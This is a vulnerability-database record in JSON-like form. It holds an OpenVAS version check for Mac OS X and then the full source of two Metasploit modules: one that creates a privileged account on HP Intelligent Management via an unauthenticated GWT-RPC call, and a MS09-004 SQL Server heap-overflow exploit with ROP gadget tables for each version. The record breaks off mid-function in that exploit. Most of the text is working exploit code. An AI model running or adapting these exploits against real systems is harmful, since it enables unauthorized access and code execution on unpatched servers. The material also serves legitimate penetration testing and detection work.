"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-02 October-15\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806154\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2015-7761\", \"CVE-2015-7760\", \"CVE-2015-5922\", \"CVE-2015-5917\",\n \"CVE-2015-5915\", \"CVE-2015-5914\", \"CVE-2015-5913\", \"CVE-2015-5902\",\n \"CVE-2015-5901\", \"CVE-2015-5900\", \"CVE-2015-5897\", \"CVE-2015-5894\",\n \"CVE-2015-5893\", \"CVE-2015-5891\", \"CVE-2015-5890\", \"CVE-2015-5889\",\n \"CVE-2015-5888\", \"CVE-2015-5887\", \"CVE-2015-5884\", \"CVE-2015-5883\",\n \"CVE-2015-5878\", \"CVE-2015-5877\", \"CVE-2015-5875\", \"CVE-2015-5873\",\n \"CVE-2015-5872\", \"CVE-2015-5871\", \"CVE-2015-5870\", \"CVE-2015-5866\",\n \"CVE-2015-5865\", \"CVE-2015-5864\", \"CVE-2015-5854\", \"CVE-2015-5853\",\n \"CVE-2015-5849\", \"CVE-2015-5836\", \"CVE-2015-5833\", \"CVE-2015-5830\",\n \"CVE-2015-3785\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n 
script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-10-29 13:24:34 +0530 (Thu, 29 Oct 2015)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-02 October-15\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details refer\n reference section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain sensitive information, execute arbitrary code, bypass intended launch\n restrictions and access restrictions, cause a denial of service, write to\n arbitrary files, execute arbitrary code with system privilege.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.6.8 through\n 10.11\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.11 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT205267\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2015/Sep/msg00008.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.([6-9|10)\\.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = 
get_kb_item(\"ssh/login/osx_version\");\nif(!osVer)\n exit(0);\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_in_range(version:osVer, test_version:\"10.6.8\", test_version2:\"10.10.5\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.11\");\n security_message(data:report);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-11-29T21:06:32", "bulletinFamily": "exploit", "description": "This module exploits a lack of authentication and access control in HP Intelligent Management, specifically in the AccountService RpcServiceServlet from the SOM component, in order to create a SOM account with Account Management permissions. This module has been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.\n", "modified": "2017-10-09T22:06:05", "published": "2013-10-23T21:01:01", "id": "MSF:AUXILIARY/ADMIN/HP/HP_IMC_SOM_CREATE_ACCOUNT", "href": "", "type": "metasploit", "title": "HP Intelligent Management SOM Account Creation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP Intelligent Management SOM Account Creation',\n 'Description' => %q{\n This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. 
This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.\n },\n 'References' =>\n [\n [ 'CVE', '2013-4824' ],\n [ 'OSVDB', '98249' ],\n [ 'BID', '62902' ],\n [ 'ZDI', '13-240' ],\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943547' ]\n ],\n 'Author' =>\n [\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Oct 08 2013\"\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('USERNAME', [true, 'Username for the new account', 'msf']),\n OptString.new('PASSWORD', [true, 'Password for the new account', 'p4ssw0rd'])\n ])\n end\n\n def get_service_desk_strong_name\n res = send_request_cgi({\n 'uri' => normalize_uri(\"servicedesk\", \"servicedesk\", \"servicedesk.nocache.js\"),\n 'method' => 'GET'\n })\n\n if res and res.code == 200 and res.body =~ /unflattenKeylistIntoAnswers\\(\\['default', 'safari'\\], '([0-9A-Fa-f]+)'\\);/\n return $1\n end\n\n return nil\n end\n\n def get_account_service_strong_name(service_desk)\n res = send_request_cgi({\n 'uri' => normalize_uri(\"servicedesk\", \"servicedesk\", \"#{service_desk}.cache.html\"),\n 'method' => 'GET'\n })\n\n if res and res.code == 200 and res.body =~ /'accountSerivce.gwtsvc', '([0-9A-Fa-f]+)', SERIALIZER_1/\n return $1\n end\n\n return nil\n end\n\n def run\n\n print_status(\"Trying to find the service desk service strong name...\")\n service_desk = get_service_desk_strong_name\n if service_desk.nil?\n print_error(\"service desk service not found.\")\n return\n end\n print_good(\"service desk strong number found: #{service_desk}\")\n\n print_status(\"Trying to find the AccountService strong name...\")\n account_service = get_account_service_strong_name(service_desk)\n if account_service.nil?\n print_error(\"AccountService service not found.\")\n 
return\n end\n print_good(\"AccountService strong number found: #{account_service}\")\n\n header= \"6|0|39\" # version | unknown | string_table size\n\n # Used to parse the payload\n string_table = [\n \"http://localhost:8080/servicedesk/servicedesk/\", # 1 servlet URL\n \"#{account_service}\", # 2 AccountService strong name\n \"com.h3c.imc.eu.client.account.AccountService\", # 3 GWT Service Class\n \"addAccount\", # 4 GWT Service Method\n \"com.extjs.gxt.ui.client.data.BaseModelData/3541881726\", # 5 BaseModelData Type\n \"com.extjs.gxt.ui.client.data.RpcMap/3441186752\", # 6 RpcMap Type\n \"isAccount\", # 7 isAccount Field\n \"java.lang.Boolean/476441737\", # 8 Boolean Type\n \"ssName\", # 9 ssName Field\n \"java.lang.String/2004016611\", # 10 String Type\n datastore[\"USERNAME\"], # 11 ssName Value\n \"authType\", # 12 authType Field\n \"java.lang.Integer/3438268394\", # 13 Integer Type\n \"ssPassword\", # 14 ssPassword Field\n datastore[\"PASSWORD\"], # 15 ssPassword value\n \"accountGroups\", # 16 accountGroups Field\n \"java.util.ArrayList/3821976829\", # 17 ArayList Type\n \"permissions\", # 18 permissions Field\n \"iMC-SOM-SERVICEDESK\", # 19 permissions Value\n \"iMC-SOM-SERVICEDESK.PROCTASK\", # 20 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT\", # 21 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.VIEW\", # 22 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.ADD\", # 23 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.MOD\", # 24 permissions Value\n \"iMC-SOM-SERVICEDESK.ACCT.DEL\", # 25 permissions Value\n \"userName\", # 26 userName Field\n \"certification\", # 27 certification Field\n \"userGroupId\", # 28 userGroupId Field\n \"java.lang.Long/4227064769\", # 29 Long Type\n \"userGroupName\", # 30 userGroupName Field\n \"Ungrouped\", # 31 userGroupName Value\n \"userGroupDescription\", # 32 userGroupDescription Field\n \"Ungrouped User.This record is generated by system, can not be deleted.\", # 33 userGroupDescription Value\n \"address\", # 34 address 
Field\n \"\", # 35 address Value\n \"phone\", # 36 phone Field\n \"email\", # 37 email Field\n \"userAppendInfo\", # 38 userAppendInfo Field\n \"java.util.HashMap/962170901\" # 39 HashMap Type\n ].join(\"|\")\n\n payload = [\n \"1\", # servlet URL\n \"2\", # strong name\n \"3\", # GWT Service Class\n \"4\", # GWT Service Method (addAccount)\n \"1\", # number of method parameters (addAccount has 1 parameter)\n \"5\", # parameter type (BaseModelData)\n \"5\", # read BaseModelData\n \"1\", # read 1 object into the BaseModelData\n \"6\", # read RpcMap\n \"15\", # read 15 objects into the RpcMap\n \"7\", # RpcMap[0] => isAccount\n \"8\", # isAccount Type (Boolean)\n \"1\", # isAccount Value (true)\n \"9\", # RpcMap[1] => ssName\n \"10\", # ssName Type (String)\n \"11\", # ssName Value\n \"12\", # RpcMap[2] => authType\n \"13\", # authType Type\n \"0\", # authType Value (0 => password)\n \"14\", # RpcMap[3] => ssPassword\n \"10\", # ssPassword Type (String)\n \"15\", # ssPassword Value\n \"16\", # RpcMap[4] => accountGroups\n \"17\", # accountGroups Type (ArrayList)\n \"0\", # accountGroups size (0)\n \"18\", # RpcMap[5] => permissions\n \"17\", # permissions Type (ArrayList)\n \"7\", # permissions size (7)\n \"10\", # permissions[0] Type (String)\n \"19\", # permissions[0] Value (iMC-SOM-SERVICEDESK)\n \"10\", # permissions[1] Type (String)\n \"20\", # permissions[1] Value (iMC-SOM-SERVICEDESK.PROCTASK)\n \"10\", # permissions[2] Type (String)\n \"21\", # permissions[2] Value (iMC-SOM-SERVICEDESK.ACCT)\n \"10\", # permissions[3] Type (String)\n \"22\", # permissions[3] Value (iMC-SOM-SERVICEDESK.ACCT.VIEW)\n \"10\", # permissions[4] Type (String)\n \"23\", # permissions[4] Value (iMC-SOM-SERVICEDESK.ACCT.ADD)\n \"10\", # permissions[5] Type (String)\n \"24\", # permissions[5] Value (iMC-SOM-SERVICEDESK.ACCT.MOD)\n \"10\", # permissions[6] Type (String)\n \"25\", # permissions[6] Value (iMC-SOM-SERVICEDESK.ACCT.DEL)\n \"26\", # RpcMap[6] => username\n \"-4\", # username 
Type - not provided\n \"27\", # RpcMap[7] => certification\n \"-4\", # certification Type - not provided\n \"28\", # RpcMap[8] => userGroupId\n \"29\", # userGroupId Type (Long)\n \"B\", # userGroupId Value - not provided\n \"30\", # RpcMap[9] => userGroupName\n \"10\", # userGroupName Type (String)\n \"31\", # userGroupName Value (Ungrouped)\n \"32\", # RpcMap[10] => userGroupDescription\n \"10\", # userGroupDescription Type (String)\n \"33\", # userGroupDescription Value (Ungrouped User.This record is generated by system, can not be deleted.)\n \"34\", # RpcMap[11] => address\n \"10\", # address Type (String)\n \"35\", # address Value (\"\")\n \"36\", # RpcMap[12] => phone\n \"-19\",# phone Type - not provided\n \"37\", # RpcMap[13] => email\n \"-19\",# email Type - not provided\n \"38\", # RpcMap[14] => userAppendInfo\n \"39\", # userAppendInfo Type (HashMap)\n \"0\" # userAppendInfo HashMap size (0)\n ].join(\"|\")\n\n gwt_request = [header, string_table, payload].join(\"|\")\n gwt_request << \"|\" # end\n\n service_url = ssl ? \"https://\" : \"http://\"\n service_url << \"#{rhost}:#{rport}/servicedesk/servicedesk/\"\n\n print_status(\"Trying to create account #{datastore[\"USERNAME\"]}...\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(\"servicedesk\", \"servicedesk\", \"accountSerivce.gwtsvc\"),\n 'ctype' => 'text/x-gwt-rpc; charset=UTF-8',\n 'headers' => {\n \"X-GWT-Module-Base\" => service_url,\n \"X-GWT-Permutation\" => \"#{service_desk}\"\n },\n 'data' => gwt_request\n })\n\n unless res and res.code == 200\n print_error(\"Unknown error while creating the user.\")\n return\n end\n\n if res.body =~ /Username.*already exists/\n print_error(\"The user #{datastore[\"USERNAME\"]} already exists.\")\n return\n elsif res.body =~ /Account.*added successfully/\n login_url = ssl ? 
\"https://\" : \"http://\"\n login_url << \"#{rhost}:#{rport}/servicedesk/ServiceDesk.jsp\"\n\n connection_details = {\n module_fullname: self.fullname,\n username: datastore['USERNAME'],\n private_data: datastore['PASSWORD'],\n private_type: :password,\n workspace_id: myworkspace_id,\n proof: \"#{login_url}\\n#{res.body}\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n create_credential_and_login(connection_details)\n\n print_good(\"Account #{datastore[\"USERNAME\"]}/#{datastore[\"PASSWORD\"]} created successfully.\")\n print_status(\"Use it to log into #{login_url}\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/hp/hp_imc_som_create_account.rb"}, {"lastseen": "2019-11-29T11:18:31", "bulletinFamily": "exploit", "description": "A heap-based buffer overflow can occur when calling the undocumented \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. An authenticated database session is required to access the vulnerable code. That said, it is possible to access the vulnerable code via an SQL injection vulnerability. This exploit smashes several pointers, as shown below. 1\\. pointer to a 32-bit value that is set to 0 2\\. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3\\. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4\\. 
On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a \"jmp esp\". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. Otherwise, it's a goner.\n", "modified": "2017-09-14T02:03:34", "published": "2009-12-31T16:26:32", "id": "MSF:EXPLOIT/WINDOWS/MSSQL/MS09_004_SP_REPLWRITETOVARBIN", "href": "", "type": "metasploit", "title": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n\n super(update_info(info,\n 'Name' => 'MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption',\n 'Description' => %q{\n A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. 
This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n An authenticated database session is required to access the vulnerable code.\n That said, it is possible to access the vulnerable code via an SQL injection\n vulnerability.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. 
That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.\n },\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '50589' ],\n [ 'CVE', '2008-5416' ],\n [ 'BID', '32710' ],\n [ 'MSB', 'MS09-004' ],\n [ 'EDB', '7501' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 512,\n 'BadChars' => \"\", # bad bytes get encoded!\n 'PrependEncoder' => \"\\x81\\xc4\\xf0\\xef\\xff\\xff\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Privileged' => true,\n 'Targets' =>\n [\n # auto targeting!\n [ 'Automatic', { } ],\n\n #\n # Individual targets\n #\n [\n # Microsoft SQL Server 2000 - 8.00.194 (Intel X86)\n # Aug 6 2000 00:57:48\n 'MSSQL 2000 / MSDE SP0 (8.00.194)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a87f26, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x6900a7, # not directly used - call [ecx+0x08]\n 'Disp' => 0x08, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0041b78f, # xchg ecx,esp / sbb [eax],al / pop esi / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x0071f5fb, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0041c9a2 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.384 (Intel X86)\n # May 23 2001 00:02:52\n 'MSSQL 2000 / MSDE SP1 (8.00.384)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 
'Vtable' => 0x00a95b2f, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x4b4f00, # not directly used - call [ecx-0x18]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0044d300, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x004a2ce9, # advance esp to next ret (add esp,0x1c / ret)\n 'Ret' => 0x004caa15 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.534 (Intel X86)\n # Nov 19 2001 13:23:50\n 'MSSQL 2000 / MSDE SP2 (8.00.534)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a64f7e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x660077, # not directly used - call [ecx-0x18]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0054131c, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x005306a0, # advance esp to next ret (add esp,0x1c / ret)\n 'Ret' => 0x004ca984 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.760 (Intel X86)\n # Dec 17 2002 14:22:05\n 'MSSQL 2000 / MSDE SP3 (8.00.760)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00ac344e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x490074, # not directly used - call [ecx+0x14]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 
0x00454303, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x00503413, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0043fa97 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)\n # May 3 2005 23:18:38\n 'MSSQL 2000 / MSDE SP4 (8.00.2039)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x0046592e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x69f5e8, # not directly used - call [ecx+0x14]\n 'Disp' => 0x14, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x007b39a8, # push ecx / pop esp / mov ax,[eax+0x18] / mov [ecx+0x62],ax / pop ebp / ret 0x4\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x00b3694d, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0047c89d # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)\n # Oct 14 2005 00:33:37\n 'MSSQL 2005 SP0 (9.00.1399.06)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x02201ca8, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x10e860f, # not directly used - call [ecx+0x14]\n 'Disp' => 0x50, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0181c0d4, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x0147deb7, # advance 
esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x0112c2c7 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86)\n # Apr 14 2006 01:12:25\n 'MSSQL 2005 SP1 (9.00.2047.00)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x0244c803, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x17139e9, # not directly used - call [ecx+0x14]\n 'Disp' => 0x52, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0183bf9c, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x014923c1, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x011b204c # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)\n # Feb 9 2007 22:47:07\n 'MSSQL 2005 SP2 (9.00.3042.00)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x027fca52, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x1106d6b, # not directly used - call [ecx+0x14]\n 'Disp' => 0x52, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x01849641, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x01498b22, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x010a5379 # jmp esp\n },\n ],\n\n [ 'CRASHER', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 09 2008'\n ))\n\n end\n\n def check\n # the ping to port 1434 method has two drawbacks...\n # #1, it 
doesn't work on mssql 2005 or newer (localhost only listening)\n # #2, it doesn't give an accurate version number (sp/os)\n\n # since we need to have credentials for this vuln, we just login and run a query\n # to get the version information\n if not (version = mssql_query_version())\n return Exploit::CheckCode::Safe\n end\n print_status(\"@@version returned:\\n\\t\" + version)\n\n # Any others?\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.194/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.384/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.534/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.760/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.2039/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.1399\\.06/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.2047\\.00/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.3042\\.00/)\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n\n mytarget = nil\n if target.name =~ /Automatic/\n print_status(\"Attempting automatic target detection...\")\n\n version = mssql_query_version\n fail_with(Failure::NoAccess, \"Unable to retrieve version information\") if not version\n\n if (version =~ /8\\.00\\.194/)\n mytarget = targets[1]\n elsif (version =~ /8\\.00\\.384/)\n mytarget = targets[2]\n elsif (version =~ /8\\.00\\.534/)\n mytarget = targets[3]\n elsif (version =~ /8\\.00\\.760/)\n mytarget = targets[4]\n elsif (version =~ /8\\.00\\.2039/)\n mytarget = targets[5]\n elsif (version =~ /9\\.00\\.1399\\.06/)\n mytarget = targets[6]\n elsif (version =~ /9\\.00\\.2047\\.00/)\n mytarget = targets[7]\n elsif (version =~ /9\\.00\\.3042\\.00/)\n mytarget = targets[8]\n end\n\n if mytarget.nil?\n fail_with(Failure::NoTarget, \"Unable to determine target\")\n else\n print_status(\"Automatically detected target \\\"#{mytarget.name}\\\"\")\n end\n else\n mytarget = target\n end\n\n sqlquery = %Q|declare @i int,@z 
nvarchar(4000)\nset @z='declare @e int,@b varbinary,@l int;'\nset @z=@z+'exec sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'',@l,@l,@l,@l,@l,@l,@l,@l'\nexec sp_executesql @z|\n\n # just crash it with a pattern buffer if the CRASHER target is selected..\n if mytarget.name == 'CRASHER'\n sploit = Rex::Text.pattern_create(2048)\n print_status(\"Attempting to corrupt memory to cause an exception!\")\n num = 32\n else\n # trigger the memory corruption\n num = mytarget['Num']\n vt_off = mytarget['VtOff']\n vt_disp = mytarget['VtDisp']\n vtable = mytarget['Vtable']\n ecx_disp = mytarget['Disp']\n esp_off = mytarget['Offset']\n hijack_esp = mytarget['ecx2esp']\n first_esp = mytarget['Popped']\n fix_esp = mytarget['FixESP']\n writable = mytarget['Writable']\n corruptable_bytes = 0x44\n\n # make sploit buff\n sz = (num + vt_off) + esp_off + (2 + corruptable_bytes) + payload.encoded.length\n #sploit = Rex::Text.pattern_create(sz)\n sploit = rand_text_alphanumeric(sz)\n\n # remove displacement! 
